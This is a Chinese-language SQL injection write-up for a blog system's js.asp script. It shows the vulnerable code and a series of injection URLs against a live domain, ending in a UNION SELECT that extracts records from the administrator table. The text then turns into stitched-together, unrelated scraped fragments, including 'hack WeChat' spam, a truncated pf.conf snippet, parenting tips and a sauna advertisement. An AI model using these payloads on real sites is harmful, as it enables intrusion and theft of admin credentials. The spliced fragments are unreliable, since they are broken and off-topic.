漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
如果您的服务器正在受ASP木马的困扰,那么希望这篇文章能帮您解决您所面临的问题。 目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。 一、使用FileSystemObject组件 Fi...
一、查看同步微信聊天记录怎么找黑客 1、怎么黑别人QQ黑客导航QQ字母在UC上可以用来显示非法信息。查看同步微信聊天记录攻击瘫痪如果遵守命令以比其他方式更多的节省时间,黑客将同意接受某种形式的权威。怎...
笔记本电脑无线网卡驱动怎么安装?有时候由于电脑出现问题,比如无线网卡驱动没有了,那么如何安装呢?下面花火网小编给大家介绍一下如何安装无线网卡驱动。 无线网卡安装方法一:使用驱动精灵智能安装...
秋葵尽管营养丰富可是吃完之后是一种较为非常容易皮肤过敏的食材,相对性于胃肠较为敏感的小宝宝而言吃秋葵时一定要造成留意,那麼一岁的宝宝可以吃秋葵吗?孩子吃秋葵时有什么常见问题。 一岁宝宝能吃秋葵吗...
1.在/etc/pf.conf加入底下規則 table persist table persist block quick from block quick from pass qu...
广州越秀桑拿洗浴中心,环境干净高端有档次 广州越秀桑拿洗浴中心,环境干净高端有档次 抬头是对男士桑拿休闲会所的敬畏。抬头看,我想念舒适的按摩,喜欢天空。我认为鞠躬和抬头没有区别。区别只是心。因...